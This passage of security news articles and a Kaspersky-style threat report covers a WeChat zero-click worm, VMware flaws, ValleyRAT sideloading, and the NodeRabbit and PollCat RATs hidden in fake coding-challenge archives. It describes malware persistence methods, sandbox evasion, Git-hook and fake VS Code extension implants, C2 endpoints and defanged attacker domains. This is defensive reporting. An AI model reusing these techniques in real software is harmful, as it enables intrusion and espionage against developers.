guarantee,” and “we don’t claim it’s unbreakable, and we’d say that about any LLM-driven agent.” A defender scanning a suspicious MCP server should treat a clean result as one input, not a clearance. No login in the open-source build The repository carries a warning against putting the platform on the internet: it “currently lacks an authentication mechanism.” A scanner built to tell an organization which of its AI services are exposed comes with instructions not to expose the scanner. “AI-Infra-Guard is a single-operator tool by design,” the team said. “No login, no RBAC.” Zhuque Lab’s answer is to put the access control outside the application: “the documented recommendation is a reverse proxy in front (nginx with Basic Auth or an IP allowlist) plus normal firewall rules.” That is the login layer. A team that skips it is running a vulnerability scanner that holds the API keys for every model it evaluates, reachable by anyone who can route to the port. AI-Infra-Guard is available for free on GitHub. Must read: 20 open-source cybersecurity tools to keep your team ready for anything GitHub CISO on security strategy and collaborating with the open-source community Subscribe to the Help Net Security ad-free monthly newsletter to stay informed on the essential open-source cybersecurity tools. Subscribe here!
helpnetsecurity.comSep 9, 2026extracted
“Zero-click” WeChat worm could hijack accounts and spread via a single call
“Zero-click” WeChat worm could hijack accounts and spread via a single call Researchers with security company Calif have discovered, weaponized, and privately reported to Tencent a critical vulnerability that allowed them to create “WeWorm”, a worm that spreads via WeChat calls without any user interaction. During its rampage, the WeWorm compromises the WeChat account of each user, and uses the saved contacts to propagate itself further, potentially reaching millions of devices within hours. The worm can hop from smartphone to smartphone, regardless of whether they are running iOS or Android, as shown in this demo: “Simply by calling a victim, WeWorm can hijack their account and call their friends,” the researchers explained. “Exploitation takes only seconds, and gives us full control of the WeChat account. We can read and send messages, make calls, and act on the victim’s behalf. Chained with other Android and iOS bugs we’ve reported and are helping fix, it can lead to full control of the device.” The worm will spread whether or not the victim answers the call. It will fail only if the victim declines the call within a few seconds, but the attacker can simply call again when the victim is asleep or otherwise unable to decline the call. A vulnerability in WeChat’s VoIP stack WeChat is a Chinese “super app” that combines a wide variety of capabilities: Text, voice, and video messaging Mobile payment Shopping, ride-hailing, food delivery, government services Social media, and more. The app is used by over a billion users, who are overwhelmingly based in China. “Working with AI, our team found the bug and wrote the first remote code execution (RCE) exploit in about two days. Building the worm took one more week,” the researchers stated. Even though they reported the flaw to Tencent – which mitigated the bug by issuing new versions of the WeChat app for iOS and Android and later mitigated the exploit for all users on the server side – and even though users don’t need to take any action to keep their WeChat accounts and smartphones protected, the researchers are keeping the technical details under wraps. However, they confirmed that it’s a “memory corruption issue in WeChat’s VoIP stack.” “We are publishing our findings to raise public awareness. These capabilities have existed for a long time in the hands of well-funded, sophisticated actors. What’s different now is that AI is putting these capabilities in the hands of less skilled actors, leaving ordinary users at unprecedented risk,” the researchers noted, and urged for world governments to collaborate with the private industry “on developing and deploying AI to make the world safer for everyone.” Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!
helpnetsecurity.comSep 8, 2026extracted
WeChat Zero-Click Worm Took Over Accounts on iPhone and Android via Incoming Calls
Researchers at the security firm Calif have built a worm that takes over a WeChat account via an incoming call and demonstrated it spreading among three test phones. The person being called does not have to answer or touch their phone for it to work, but the caller must already be one of their WeChat contacts. Calif reported the flaw to Tencent in July and says the company has since blocked the exploit for all users. No attacks using the flaw have been reported, and Calif does not say there were any. Attacks that require no action from the target, known as zero-click attacks, are not new. Last year, WhatsApp patched a flaw it said may have been used in targeted attacks. Answering the call does not stop the attack. Calif said a person who picks up hears nothing and the exploit still works. Declining the call ends that attempt, but the attacker can call again later, for example while the target is asleep. The caller has to be on the target's WeChat contact list. Calif said that is not much of a barrier, because once a contact is taken over, the extra trust WeChat gives to contacts works for the attacker rather than the user. That handover is the part the demo shows. One Android phone called an iPhone and took over its WeChat while the phone was still ringing. The compromised iPhone then called a second Android phone and took control of it the same way. Calif's post describes routes an attacker could use rather than ones it tested. Once the exploit runs, the researchers said, the attacker has full control of the WeChat account and can read and send messages, make calls, and act as the account's owner. On its own, it does not give control of the phone itself. For many users, that account is not only a chat app. WeChat's App Store listing covers payments, official accounts and mini programs inside the app. Tencent put the combined monthly active users of WeChat and Weixin at 1.439 billion as of 30 June 2026 in its second-quarter results. Tencent released version 8.0.77 for Android and 8.0.76 for iOS on 21 August, according to its own release log. Calif said those releases mitigated the bug and that, on 28 August, it confirmed the exploit was blocked on Tencent's servers as well. The researchers said Tencent has "mitigated our exploit for all users." Asked whether the underlying flaw had also been fixed, Calif told The Hacker News it could not comment. Tencent has published no advisory about the flaw, and its release notes for the iOS version and its App Store entry describe the update as only bug fixes. According to Calif, the block runs on Tencent's servers, so it does not require users to install anything. Running a current version is still the safer choice, and on 8 September that listing showed 8.0.76, released on 21 August, as the current version. Calif told The Hacker News it tested the exploit against WeChat 8.0.76 for Android and 8.0.75 for iOS, in each case the version numbered one below the release Tencent shipped on 21 August. It said the tests ran on iOS 26.6 and some older Android versions. Neither company has published a full list of affected versions, so a user on a different build cannot tell whether it was vulnerable. Tencent also ships WeChat clients for HarmonyOS, Windows, Mac and Linux on their own release schedules. Calif declined in the same reply to say whether it had tested any of them, and Tencent has not addressed them. Calif is holding back the technical details and plans to present the full analysis at a conference. It has not published anything a defender could search for, and there is no way for a user to tell whether they were called. Checks on 8 September found no CVE identifier for the flaw and no advisory on Tencent's security response site, which lists the latest announcement as April 2022. The Hacker News has contacted Tencent for comment. Calif said it worked with AI to find the bug and write the first exploit that could run code on the phone in about two days. Building the worm took another week, it said. Calif told The Hacker News it had designed a set of skills that guide an AI in exploring and identifying potential attack surfaces in messaging apps, and that the AI discovered this flaw using them. Its own timeline gives longer gaps. Its engineering team knew of the bug on 23 July, the first Android exploit was finished on 30 July, and the worm demo on 11 August. The post does not say whether the shorter figures count only working time.
thehackernews.comSep 8, 2026extracted
Critical VMware Workstation and Fusion Flaw Lets VM Admins Execute Host Code
Broadcom has released security updates for two security flaws impacting VMware Workstation and Fusion, including one critical bug that could result in arbitrary code execution under certain conditions. The vulnerability, tracked as CVE-2026-59346 (CVSS score: 9.3), is an integer-overflow vulnerability that a local attacker with elevated privileges can exploit to run arbitrary code. "A malicious actor with local administrative privileges on a virtual machine with VMXNET3 virtual network adapter may exploit this issue to execute code on the host," Broadcom said in an alert. The tech giant credited @h4urek, @cameudis, and Stan S for discovering the issue. Also patched by Broadcom is a stack-based buffer-overflow vulnerability in HGFS (CVE-2026-59347, CVSS score: 8.1), which can be exploited by a bad actor with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host. Yeonghyeon Choi and Tianchu Chen of Tencent Xuanwu Lab have been acknowledged for reporting the flaw. In both cases, successful exploitation hinges on an attacker already possessing local administrative privileges, although it's worth noting that they can be obtained through a separate compromise through phishing or exploiting weak user configurations. The two vulnerabilities affect VMware Workstation and VMware Fusion versions 25H2 and 26H1. Broadcom said there are no workarounds that address the two vulnerabilities, adding that they have been patched in VMware Workstation 26H1u1 and VMware Fusion 26H1u1. Although there is no evidence that the security flaws have been exploited in the wild, vulnerabilities in VMware products have been an attack magnet. As recently as last month, threat actors were observed actively exploiting two shortcomings in VMware vCenter, namely CVE-2026-59309 and CVE-2026-59310, with the latter suspected to be weaponized by a China-nexus advanced persistent threat (APT) actor. The activity, which started five calendar days after public disclosure of the flaw, is estimated to have breached 361 unique victim IP addresses across 47 countries. Most of the infections were concentrated in Germany (55), the U.S. (41), Turkey (38), Iran (26), and France (25).
thehackernews.comSep 5, 2026extracted
Scarichi un’app innocua e ti ritrovi spiato: il malware nascosto dietro un programma firmato
Gli esperti di kaspersky hanno rilevato che il malware Valley RAT utilizza uno schema di diffusione piuttosto insolito. I criminali informatici nascondono l’artefatto all’interno di una versione modificata dell’applicazione pubblicitaria cinese QN Wallpape r e avvia il codice dannoso da un processo firmato. Un campione sospetto ha attirato l’attenzione degli esperti dopo la segnalazione di uno dei clienti. Inizialmente, il file veniva identificato come un normale software pubblicitario, ma un’analisi più approfondita ha rivelato un’attività di rete insolita. Un esame ancora più dettagliato di questa attività ha portato i ricercatori a una catena di infezione di ValleyRAT (mentre le funzioni pubblicitarie dell’applicazione non funzionavano affatto). Secondo gli esperti, veniva installata la piattaforma per il lavoro di squadra DingTalk, il browser Google Chrome e aprire la pagina di download di Tencent Meeting. Tuttavia, tutte queste azioni servivano solo come diversivo: l’installer, in ogni caso, distribuiva nel sistema della vittima una versione modificata del software per la gestione degli sfondi e lo aggiungeva all’avvio automatico. Il vero QN Wallpaper appartiene effettivamente alla categoria del software pubblicitario che veniva installato dall’installer del malware. Tuttavia, gli attaccanti utilizzano QN Wallpaper perché il suo file eseguibile ha una firma digitale valida. Insieme al programma, sul dispositivo viene inserita la libreria dannosa libcef.dll, che viene caricata all’avvio di QnWallpaper.exe utilizzando la tecnica del DLL sideloading. Si osserva che prima di questo, l’installer ha tentato di disattivare la protezione di Windows Defender tramite il parametro del registro DisableAntiSpyware, e se l’utente non aveva i privilegi di amministratore, il malware ha tentato di ottenerli tramite l’utilità runas. Successivamente, la libreria dannosa libcef.dll estrae il payload crittografato ValleyRAT : a seconda del processo, viene memorizzato in un file separato PeLoader o nelle risorse della stessa libreria. Entrambe le varianti sono crittografate con AES e differiscono principalmente nella configurazione (in particolare negli indirizzi dei server di controllo). Dopo la decrittazione, la libreria carica ValleyRAT si attiva in memoria. Dopo l’avvio, ValleyRAT raccoglie informazioni dettagliate sul sistema della vittima, intercetta i tasti premuti e il contenuto della clipboard, monitora la finestra attiva al momento e può fare screenshot. Inoltre, su comando dei propri operatori, il malware può riavviare e spegnere la macchina infetta, cancellare i log, modificare gli indirizzi dei server di controllo e caricare moduli aggiuntivi da risorse esterne. ValleyRAT può anche caricare moduli aggiuntivi sotto forma di librerie DLL o shellcode . Per eseguire lo shellcode, utilizza la tecnica del Process Hollowing, inserendolo nel processo svchost. Di conseguenza, la chiusura forzata del processo del malware può portare alla comparsa di BSOD. I ricercatori ritengono che la mascheratura come software pubblicitario non sia casuale. Un processo firmato suscita meno sospetti, inoltre gli utenti spesso aggiungono tali programmi alle eccezioni dell’antivirus per garantire il corretto funzionamento di tutte le funzioni. Secondo le informazioni di inizio del 2026, l’azienda ha rilevato ValleyRAT e il malware ad esso associato in oltre 100.000 sistemi di più di 1.500 utenti unici, principalmente situati in Cina e India. Gli esperti ritengono che la geografia degli attacchi e l’uso di ValleyRAT possano indicare la partecipazione di questo gruppo Silver Fox, che è un noto operatore di questo famiglia di malware. L'articolo Scarichi un’app innocua e ti ritrovi spiato: il malware nascosto dietro un programma firmato proviene da Red Hot Cyber .
redhotcyber.comSep 5, 2026extracted
Iranian Hackers Pose as Recruiters to Deliver Cross-Platform RATs Through Coding Tests
The Iranian Nimbus Manticore hacking group has been attributed to two previously undocumented malware families that highlight the continued evolution of its toolset and likely expand its targeting footprint to infect Linux and Apple macOS systems using cross-platform remote access trojans (RATs) developed using Node.js and JavaScript. Russian cybersecurity company Kaspersky is tracking the malware strains under the names NodeRabbit and PollCat. The first sample of NodeRabbit was discovered on a system in Afghanistan, with subsequent sightings on two distinct machines located in Egypt and Ethiopia. "Its operators deliver [NodeRabbit] through spear-phishing messages on LinkedIn and other job search platforms that contain trojanized coding challenge archives," Kaspersky security researcher Omar Amin said. "Like NodeRabbit, PollCat is a cross-platform RAT, but it is written in obfuscated JavaScript also distributed through trojanized coding challenge archives." While Nimbus Manticore has historically employed malware written in C, C++, and Go, and relied on DLL search-order hijacking techniques to deploy them, the latest findings mark the threat actor's foray into cross-platform tools to accomplish its goals. The development also comes amid a rapid expansion of the hacking group's malware arsenal in recent months, including - A Windows backdoor called NightLedger Two custom WebSocket tunnelers, BridgeHead and ArcBridge A reverse SSH tunneling tool A backdoor that shares overlaps with TWOSTROKE The starting point of the suspicious activity observed in the Afghanistan-based system starts with a ZIP file ("Front-Technical-Challenge.zip") hosted on AWS that's assessed to have been delivered as part of a job opportunity for an engineering role. The threat actor is said to have masqueraded as a talent acquisition specialist at a major technology company to approach a software engineer and invited them to complete a technical assignment. It's worth noting that Nimbus Manticore is also tracked under the moniker Iranian Dream Job for its use of recruitment-themed lures to trick prospective targets into infecting their own computers, a tactic long adopted by the North Korea-linked Lazarus Group. The archive contains source code for a project management tool called Taskflow and instructs candidates to "find and fix all bugs in the frontend code" as part of an "engineering challenge" within three hours and without relying on artificial intelligence (AI)-assisted tools. The instructions specifically ask the candidates to refrain from modifying the server component of the application ("server.js"), claiming it's "bug-free and functions correctly." However, it's in this file that the malicious code is embedded. "The first line of server.js imported a trojanized npm package named colorized_terminal, version 2.1.0," Kaspersky said. "The attackers bundled the package directly in the challenge task archive's node_modules directory rather than publishing it to the npm registry. When imported, the package silently launched an implant from node_modules/.cache/.320697f1/index.js as a detached background process." The implant in question is NodeRabbit, which communicates with one of three Azure-hosted command-and-control (C2) addresses ("plugplay.azurewebsites[.]net," "rgbteller.azurewebsites[.]net," and "wslwebui.azurewebsites[.]net") through three distinct API endpoints - /api/rabbit/checkin, to register agent and host information /api/rabbit/task, to poll for commands /api/rabbit/result, to send task results The malware supports 11 commands that allows it to gather host details, list running processes, execute arbitrary shell commands, enumerate directories, read a file in chunks and return Base64-encoded data, decode Base64-encoded text and write it at a chosen file offset, delete a file or recursively delete a directory, create directories recursively, enumerate adapters, MAC addresses, IP addresses, and DNS settings, and alter beacon interval. Another notable capability of NodeRabbit is to write a Base64-encoded Node.js script to a randomly named ".tmp" file, execute it, and then delete it to cover up traces of malicious activity. Kaspersky said it identified two more variants of NodeRabbit that share the same code lineage, each recovered from Egypt and Ethiopia - A second variant that uses a different trojanized npm package named pretty-log (version 2.1.0) instead of colorized_terminal, while also partially implementing corporate proxy support and terminating if found to be running in an analysis environment A third variant that's also launched using the pretty-log npm package but uses a different set of API endpoints to accomplish the same tasks - - /sdk/v2/ready - /sdk/v2/config - /sdk/v2/events Persistence is achieved depending on the operating system: a Windows Run registry key on Windows, a cron entry for Linux, and a launch agent on macOS. The persistence mechanism mimics either a Microsoft Edge browser update (first variant) or Intel's Driver & Support Assistant (second variant). The third variant, on the other hand, does not impersonate any legitimate software, but also takes into account the Windows Subsystem for Linux (WSL) to create a daily 10 a.m. Windows task that launches a Visual Basic Script file through "wscript.exe" and "wsl.exe." In addition, it features 12 new commands to - Enumerate accessible Windows drive letters or WSL-mounted drives Execute a process Kill process by PID or image name Replace the active C2 server and attempt to keep the new configuration Return the current C2 server Harvest account addresses from Outlook OST and PST artifacts Attempt to install a fake VS Code extension named "GitHub Copilot Helper" and Windows Run value for added persistence Check selected VS Code, scheduled-task, and Run-key persistence indicators Remove the fake extension Search recent and common development locations for Git repositories Inject a launcher into a repository's Git hooks for added persistence Remove the marked Git-hook launcher Nimbus Manticore has also been observed using programming challenge lures ("RankChallenge-react-6uJSX3-main.zip") distributed via time-limited developer assessments to deliver PollCat. "Although the visible exercise is not a security CTF, the project uses CTF terminology in several places," Kaspersky said. "The root package is named ctf-server, the backend prints CTF server running, the frontend uses several ctf-* storage keys, and the tutorial refers to path/to/ctf." "These repeated labels, together with instructions that do not fully match the delivered application, are consistent with an AI-assisted or template-generated project. One possible explanation is that the attacker prompted an AI coding assistant to create a CTF-style React platform and later inserted the malicious components." A PDF tutorial present within the archive prompts the target to click "Continue" and enter an attacker-supplied six-digit one-time password (OTP) that's refreshed every 30 seconds, and complete the challenge within a one-hour session. The compressed timeline to activate the assessment is likely an attempt to create a false sense of urgency and make them run the project as soon as possible to increase the likelihood of an infection. Despite the one-hour session window, PollCat runs independently of the OTP authentication process, unaffected by the success or failure of the OTP validation step. A failed validation prevents the victim from accessing the protected challenge features, while a successful OTP validation issues a JWT and starts an additional PollCat instance. For persistence, the malware creates a daily scheduled task on Windows, Linux, or macOS, and then connects to a C2 server to send basic host information and await further instructions. It supports 22 commands and communicates via seven API endpoints - /beacon, to register the client and obtain a socketId /gate/hello, to send host, user, domain, operating system information, and its current privilege level /gate/fetch?token= , to poll for commands /gate/submit, to submit a Base64-encoded command-result structure /vault/ , to fetch a hosted file and write it to the victim machine /vault/push, to upload a local file or file chunk to the C2 /gate/track, to report chunk-upload progress The commands span the typical backdoor gamut, enabling the operator to perform file operations, execute shell commands, upload/download files, run JavaScript, load DLLs, create or extract a ZIP archive, and enumerate running processes, drives, volumes, or mount points. Three commands, namely WS_DOWNLOAD, REQUEST_ELEVATION, and PERSIST, are currently not implemented. PollCat also searches for folders matching 24 hard-coded strings corresponding to software and security vendors, including Google, Microsoft, Palo Alto Networks, Cisco, VMware, Fortinet, Citrix, Check Point, Juniper Networks, LogMeIn, Sophos, Symantec, Trend Micro, McAfee, Kaspersky Lab, ESET, Bitdefender, Avast, CrowdStrike, SentinelOne, Malwarebytes, Brave, Tencent, and Naver. When a matching folder is found, the malware inventories the folder's root contents but does not recursively scan the product's directory. The results are then transmitted in the form of JSON to the "/api/system-details/result" endpoint. The activity's links to Nimbus Manticore stem from the structural, command fetching, beacon timing, and command set similarities between PollCat and MiniFast (aka MiniUpdate or Retrograde), a backdoor previously attributed to the group, as well as the use of Azure Websites and Cloudflare‑backed domains for C2. "The shift to cross-platform scripting gives the operators a single codebase that runs on Windows, Linux, and macOS, with payloads that blend naturally into developer workstations," Kaspersky said. "The delivery mechanism, however, remains consistent with Mirage Kitten’s historical tradecraft: the use of recruiter personas on LinkedIn to target critical sectors across the Middle East and Africa for cyber espionage purposes."
thehackernews.comSep 1, 2026extracted
Mirage Kitten targeting aviation and FinTech sectors across the Middle East and Africa with a new malware set
While monitoring Mirage Kitten activity, we uncovered a previously undocumented malware family that we dubbed NodeRabbit. We identified the first sample on a system in Afghanistan. Further threat hunting revealed two additional, more advanced, variants: one on a system in Egypt and another on a system in Ethiopia. NodeRabbit is a cross-platform remote access trojan (RAT) built with Node.js. It targets Windows, Linux, and macOS. Its operators deliver it through spear-phishing messages on LinkedIn and other job search platforms that contain trojanized coding challenge archives. During the same investigation, we discovered another previously undocumented malware family that we dubbed PollCat. Like NodeRabbit, PollCat is a cross-platform RAT, but it is written in obfuscated JavaScript also distributed through trojanized coding challenge archives. Mirage Kitten has historically relied on native malware written in languages such as C, C++, and Go, often deploying it through DLL search-order hijacking. NodeRabbit and PollCat represent the first publicly documented use of Node.js- and JavaScript-based malware by this APT group. Kaspersky’s products detect this threat as Trojan.JS.MirageKitten.* Background During recent threat research, we detected suspicious activity on a system in Afghanistan. We traced it to an archive containing a software development project that the user may have received during a job application process. The archive purported to contain a coding challenge for candidates applying for an engineering role. The archive, Front-Technical-Challenge.zip (MD5: 1EA83E4E4592B01E4ACAB63EB867BEE5 ), was hosted in an Amazon S3 bucket at: https://oracle-challenge.s3[.]us-east-1.amazonaws[.]com/Front-Technical-Challenge.zip It contained TaskFlow, an app for software engineering assessment built with Express, React, and Vite. The accompanying README instructed the candidate to review the application and fix defects in its frontend. It also claimed that server.js was bug-free and should not be modified, conveniently directing attention away from the only application source file the attackers had altered. README file for a trojanized coding challenge app The README also imposed a three-hour time limit and prohibited the use of AI assistants. Notably, an AI code-review assistant tasked with auditing the project would likely have flagged the suspicious first-line import of an unknown npm package and warned the targeted developer that the project was trojanized. Rules and time limit included in the trojanized coding challenge app README file The first line of server.js imported a trojanized npm package named colorized_terminal , version 2.1.0 . The attackers bundled the package directly in the challenge task archive’s node_modules directory rather than publishing it to the npm registry. When imported, the package silently launched an implant from node_modules/.cache/.320697f1/index.js as a detached background process. Retrospective threat hunting across our telemetry revealed the broader scope of the campaign. We identified three NodeRabbit variants with a shared code lineage; each was recovered from a system in a different country. The operators delivered the variants through similarly themed coding challenges and used two trojanized packages, colorized_terminal and pretty-log , both pinned to version 2.1.0 . The campaign also delivered PollCat, a second RAT with a substantially different structure, through a separate coding challenge lure. We’ll analyze PollCat later in this research. Initial access The infection chain begins with fake recruiter accounts contacting prospective targets on a job search platform. According to a publicly cited source, a threat actor posing as a talent acquisition specialist at a major technology company contacted a software engineer and advertised a job opening, inviting the target to complete a technical assessment. The target received a link to a coding challenge hosted on Amazon S3 and was pressured to download and run the project immediately. This public post matches the delivery chain we reconstructed from our telemetry: recruiter outreach on a job search platform, a coding challenge presented as a technical assessment, and a trojanized project archive hosted on legitimate cloud infrastructure. NodeRabbit RAT: the first variant We discovered the first NodeRabbit variant on a system in Afghanistan. The malware was concealed within the TaskFlow assessment at node_modules/.cache/.320697f1/index.js and executed by the trojanized colorized_terminal package. Once running, NodeRabbit generates a unique agent identifier from available host information. It calculates the SHA-256 hash of the hostname, username, operating system version, architecture, and MAC address, then truncates the result to its first 32 hexadecimal characters. NodeRabbit binds a TCP listener to 127.0.0.1:48739. This listener acts as a single-instance mechanism. If the malware cannot bind to the port, it assumes that another instance is already running and terminates silently. NodeRabbit uses a persistence mechanism for each operating system: Operating system Persistence mechanism Windows Copies itself to %APPDATA%\Microsoft\EdgeUpdate\msedge_update.js; clones the local node.exe to nodew.exe in the same folder and patches its PE subsystem from Console to Windows GUI to suppress the console window; creates HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeUpdate registry key executing nodew.exe msedge_update.js Linux Copies itself to ~/.config/microsoft-edge-update/msedge_update.js and creates an @reboot cron entry that invokes the script using the current Node.js executable. macOS Copies itself to ~/.config/microsoft-edge-update , creates ~/Library/LaunchAgents/com.microsoft.edgeupdate.plist configuration file pointing at the copy’s location with RunAtLoad and KeepAlive parameters, and attempts to load it. The malware communicates with its command-and-control servers through three API endpoints, choosing from the following Azure-hosted C2 infrastructure addresses. On failure, it switches to the next C2 address: 1. https://plugplay.azurewebsites[.]net 2. https://Rgbteller.azurewebsites[.]net 3. https://Wslwebui.azurewebsites[.]net Method Endpoint Purpose POST /api/rabbit/checkin Register agent and host info POST /api/rabbit/task Poll for commands POST /api/rabbit/result Submit results NodeRabbit serializes each C2 request object as JSON and wraps it with AES-256-GCM. The AES key is the SHA-256 digest of an ASCII seed embedded into the agent. Every request uses a fresh 12-byte IV and a 16-byte authentication tag: The malware sends encrypted requests using the following structure: { "d": "base64(IV || ciphertext || authentication_tag)", "_r": "8 hexadecimal characters", "_t": "epoch timestamp" } C2 responses are structured the same way and may contain a command to execute. We observed the first NodeRabbit variant supporting 11 commands: Command Functionality sys:info Return hostname, domain user information, username, and process ID. proc:list List running processes. proc:start Execute an arbitrary shell command. fs:list List a directory. fs:read Read a file in chunks and return Base64 data. fs:write Decode Base64 and write it at a chosen file offset. fs:delete Delete a file or recursively delete a directory. fs:mkdir Create directories recursively. net:config Enumerate adapters, MAC addresses, IP addresses, and DNS settings. agent:sleep Change the beacon interval. script:exec Write a base64 Node.js script to a randomly named .tmp file, execute it and delete it. NodeRabbit RAT: the second variant Retrospective threat hunting following the discovery in Afghanistan led us to a second infection on a system in Egypt. This sample is a more advanced NodeRabbit variant, launched through the trojanized pretty-log package instead of colorized_terminal . Before running its core functionality, the malware checks whether the host resembles an analysis environment. It terminates if it detects limited system memory, a low CPU count, short system uptime, analyst-associated usernames or hostnames, or common analysis tools running on the system. Before terminating, the malware generates benign HEAD requests to www.google.com, www.microsoft.com , and www.cloudflare.com , then exits without ever contacting its C2 infrastructure. Most likely, it attempts to look less suspicious by showing some benign activity before exiting. Variant 2 implements partial corporate proxy support: it checks HTTP(S) proxy environment variables, Windows Internet Settings, including an explicit PAC URL, and WinHTTP configuration; tunnels its HTTPS C2 through HTTP CONNECT . It first tries to establish an unauthenticated connection. If it fails, it retries using URL-embedded basic credentials. Finally, it delegates Windows NTLM/Negotiate challenges to curl.exe --proxy-anyauth --proxy-user . It caches the proxy-discovery result, including when no proxy is found, for five minutes. If the polling loop detects a network-interface or IP-address change, it clears the cache and runs proxy discovery again on the next checkin. To make sure a single instance is running, Variant 2 uses a host-specific port derived from the agent identifier instead of the fixed TCP port used by the first variant. It interprets the first four hexadecimal characters of the identifier as an integer and applies the following calculation: 41984 + (value mod 5000) . The resulting listener port falls between 41984 and 46983 . Unlike the shared port used by Variant 1, this port varies depending on the infected host. For persistence, Variant 2 masquerades as Intel Driver & Support Assistant. The exact persistence mechanism, once again, depends on the operating system. Operating system Persistence mechanism Windows Copies itself to %LOCALAPPDATA%\Intel\DSA\idriver_support.js . It then copies the local node.exe binary to IntelDSA.exe and changes its PE subsystem from Console to Windows GUI, suppressing the console window. Finally, it creates a scheduled task named IntelDriverSupportUpdate , which runs daily at 10AM and executes IntelDSA.exe with the dropped script. Linux Copies itself to ~/.config/intel-dsa/idriver_support.js and creates an @reboot cron entry. macOS Copies itself to ~/Library/Application Support/Intel DSA/idriver_support.js and creates the LaunchAgent com.intel.dsa.helper with RunAtLoad and KeepAlive enabled. NodeRabbit RAT: the third variant Further threat hunting identified a third NodeRabbit variant on a system in Ethiopia. Like the second variant, it is launched through the trojanized pretty-log package. It retains much of the previous variant’s functionality but introduces significant changes to its command-and-control configuration, command set, and persistence mechanisms. The third variant communicates with its C2 infrastructure through a different set of API endpoints: Method Endpoint Purpose POST /sdk/v2/ready Register agent and host info POST /sdk/v2/config Poll for commands POST /sdk/v2/events Submit results We observed the malware using a C2 chain composed of Azure- and Cloudflare-hosted domains. 1. https://visitfinancedentists[.]com 2. https://kyrasey-f8hfexa5cqamh7fk.westeurope-01.azurewebsites[.]net 3. https://healthcomfsdpower[.]com For persistence, Variant 3 implements the following mechanisms depending on the operating system in use: Operating system Persistence mechanism Windows Attempts to copy the payload to ProgramData or LocalAppData , create a build-specific daily 10AM task, and start the copied payload. To choose the exact directory, it tries to list C:\Windows\System32\config . If successful, it selects ProgramData with /ru SYSTEM /rl highest; in case of a failure, it selects LocalAppData without explicit /ru or /rl settings. macOS Copies the payload to ~/Library/Application Support, creates and loads a RunAtLoad/KeepAlive LaunchAgent and starts the copied payload. Linux Copies the payload to ~/.local/share , attempts to add an @reboot cron entry, and starts the copied payload. If crontab -l fails, persistence is skipped. WSL Uses the payload copied for persistence on the main Linux system, as described above. Writes launcher.vbs under the Windows user profile, and creates a daily 10AM Windows task that relaunches it through wscript.exe and wsl.exe . A new command, agent:servers , replaces the active in-memory C2 server list and can write the updated list to .sv.json . The third variant retains the original 11 commands and adds 12 new ones, bringing the total to 23. New commands Functionality fs:drives Enumerate accessible Windows drive letters or WSL-mounted drives proc:exec Execute a process proc:kill Kill process by PID or image name agent:servers Replace the active C2 and attempt to keep the new configuration agent:getchain Return the current C2 outlook:emails Harvest account addresses from Outlook OST and PST artifacts persist:check Check selected VS Code, scheduled-task, and Run-key persistence indicators persist:vscode Attempt to install a fake VS Code extension and Windows Run value persist:vscode:remove Remove the fake extension persist:projects:scan Search recent and common development locations for Git repositories persist:project:inject Inject a launcher into a repository’s Git hooks persist:project:remove Remove the marked Git-hook launcher Beyond the persistence mechanisms described above, Variant 3 introduces two additional persistence mechanisms that relaunch the malware through common developer workflows. 1. Malicious VS Code extension The persist:vscode command first copies the payload to its build-specific install path. If a compatible extension directory exists, it creates a fake extension displayed as GitHub Copilot Helper , with the description AI coding assistant helper service and the activation event on StartupFinished . The extension’s extension.js file attempts to start the installed payload as a detached Node.js process. To look less suspicious to the user, it uses a trusted publisher name borrowed from local extension metadata or a trustedPublishers value found in state.vscdb . However, no signature or trusted status is copied. Separately, the handler tries to disable Workspace Trust if the VS Code User directory exists. On Windows, it attempts to establish persistence using a current-user Run registry key value even if the extension directory is missing. 2. Git hook injection Git-hook persistence works in two steps. First, persist:projects:scan checks recent VS Code workspace paths directly. Under common locations such as ~/projects and ~/source , it checks only the first 60 immediate children, not the root itself, and returns no more than 20 repositories. For a selected repository, persist:project:inject appends a marked launcher to .git/hooks/post-merge and .git/hooks/post-checkout by default. The marker is # shepherd-persist; the line following the marker attempts to start the installed payload with Node in the background. A later Git operation must trigger one of those hooks, and the referenced Node executable and payload must still exist. PollCat RAT While tracking NodeRabbit infections, we discovered another malicious tool we dubbed PollCat, which is also distributed under the guise of a programming challenge. The sample we obtained resides inside RankChallenge-react , a React code-fixing challenge presented as a time-limited developer assessment. Running the project invokes npm i && node index.js , which starts the local application and attempts to open the challenge in the user’s browser. Although the visible exercise is not a security CTF, the project uses CTF terminology in several places. The root package is named ctf-server , the backend prints CTF server running , the frontend uses several ctf-* storage keys, and the tutorial refers to path/to/ctf . These repeated labels, together with instructions that do not fully match the delivered application, are consistent with an AI-assisted or template-generated project. One possible explanation is that the attacker prompted an AI coding assistant to create a CTF-style React platform and later inserted the malicious components. README instructions and challenge overview included in the trojanized React coding project The PDF tutorial contained in the same archive as the project tells the target to click Continue , enter a six-digit OTP code, and complete the challenge within a one-hour session. It states that codes are supplied by the recruiter, are single-use, and expire quickly; the visible login page also claims that codes rotate every 30 seconds. In the delivery scenario described by the investigation, the threat actor posing as a recruiter could provide the code directly to the targeted developer. This gives the operator control over access to the lure, while the expiring code and countdown create a sense of urgency, pressuring the target to run the project and complete the assessment quickly, potentially accelerating the infection process. One-hour session window enforced by the trojanized coding challenge The bundled .env file contains the JWT signing secret, OTP service URL, and OTP client ID. Configuration embedded in .env file of the trojanized coding project, including the OTP service URL and client identifier The application forwards submitted codes to an attacker-managed domain registered in late June-2026: https://lifespotify[.]com/api/users/b879746e-fed9-4211-a6da-4d8223681267/otp/validate . That said, PollCat starts independently of the OTP authentication process. During application startup, app.js loads requireAuth.js , which imports and immediately starts the malicious requireObjects.js component. PollCat can therefore begin C2 registration and command polling while the application is still loading, before the user enters an access code. A failed OTP validation prevents the user from accessing the protected challenge features, but PollCat continues running in the background. A successful OTP validation issues a JWT and creates another worker that starts an additional PollCat instance. The first authenticated request also triggers the persistence attempt. Persistence starts when the first request carrying a valid JWT reaches the protected middleware. PollCat then uses one of the following methods: Operation system Persistence mechanism Windows Writes package.json and requireObject.js to %APPDATA%\Microsoft\Network, runs npm install, and creates a daily task named NetSync_<username> and scheduled for 09AM that runs the worker with Node.js. Linux Writes the worker to ~/.node_packages, runs npm i, and appends both a daily 09AM cron line and an @reboot line. macOS Uses the same ~/.node_packages copy and cron path, then creates and loads ~/Library/LaunchAgents/com.harsh.requireobject.plist with RunAtLoad and 